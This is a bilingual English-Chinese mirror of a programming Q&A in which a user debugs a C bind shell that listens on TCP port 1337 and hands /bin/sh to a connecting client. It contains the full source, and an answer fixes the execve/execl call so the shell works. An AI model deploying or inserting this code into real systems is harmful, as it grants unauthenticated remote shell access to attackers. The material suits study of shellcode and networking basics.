[英]Simple Linux Bindshell in C - Returning Shell Control to Client
I am having trouble getting a simple TCP bindshell to work, and I am hoping someone here can help me out. 我在使用简单的TCP绑定外壳时遇到了麻烦,我希望这里有人可以帮助我。
Here is some simple sample code in C, the problem are for me is the last 5 lines or so. 这是C语言中的一些简单示例代码,对我来说,问题是最后5行左右。
Let's call this simple_bindshell.c
(I am not the author): 我们称它为
simple_bindshell.c
(我不是作者):
// Author: Julien Ahrens (@MrTuxracer)
// Website: http://www.rcesecurity.com
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void)
{
int i; // used for dup2 later
int sockfd; // socket file descriptor
int clientfd; // client file descriptor
socklen_t socklen; // socket-length for new connections
struct sockaddr_in srv_addr; // server aka listen address
struct sockaddr_in cli_addr; // client address
srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address
srv_addr.sin_port = htons( 1337 ); // server port, converted to network byte order
srv_addr.sin_addr.s_addr = htonl (INADDR_ANY); // listen on any address, converted to network byte order
// create new TCP socket
sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
// bind socket
bind( sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr) );
// listen on socket
listen(sockfd, 0);
// accept new connections
socklen = sizeof(cli_addr);
clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &socklen );
// dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
for(i = 0; i <= 2; i++)
dup2(clientfd, i);
// magic
// execve( "/bin/sh", NULL, NULL );
//UPDATE: fixed exec call, shell still not returned to
// client connecting with execl or proper execve
execl("/bin/sh", "/bin/sh", (char *)NULL);
}
Problem Description 问题描述
When compiled, I can connect to the socket (using: nc 192.168.xx 1337). 编译后,我可以连接到套接字(使用:nc 192.168.xx 1337)。 The problem is my client connection is closed immediately, and the shell is returned to the
simple_bindshell
process on the server, not the client who initiated the connection. 问题是我的客户端连接立即关闭,并且外壳返回到服务器(而不是发起连接的客户端)上的
simple_bindshell
进程。
I get that we've duplicated the stdin, stdout, stderr file descriptors, but I am not sure how that links to executing /bin/sh. 我知道我们已经复制了stdin,stdout,stderr文件描述符,但是我不确定如何链接到执行/ bin / sh。
What I would like to happen is the client connecting in gets an interactive shell back. 我想发生的是,连接的客户端获得了交互式外壳。
I have tried calling execve in a few different ways (eg passing different values for argv), but I can't seem to get my head around why it's not working. 我试图以几种不同的方式调用execve(例如,为argv传递不同的值),但是我似乎无法弄清为什么它不起作用。 Does execve need the client file descriptor?
execve是否需要客户端文件描述符?
Any help would be appreciated 任何帮助,将不胜感激
Your arguments to execve()
are wrong. 您对
execve()
参数是错误的。 The second argument must be a pointer to an array of strings, which will become the argv
array in the new program. 第二个参数必须是指向字符串数组的指针,该字符串数组将成为新程序中的
argv
数组。 The third argument must be a pointer to an array of strings that will become the environment array of the new program. 第三个参数必须是指向将要成为新程序的环境数组的字符串数组的指针。
char *new_argv[] = {"/bin/sh", NULL};
char *new_envp[] = {NULL};
execve( "/bin/sh", new_argv, new_envp);
You could do it more simply using execl()
: 您可以使用
execl()
更简单地完成此操作:
execl("/bin/sh", "/bin/sh", (char *)NULL);
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.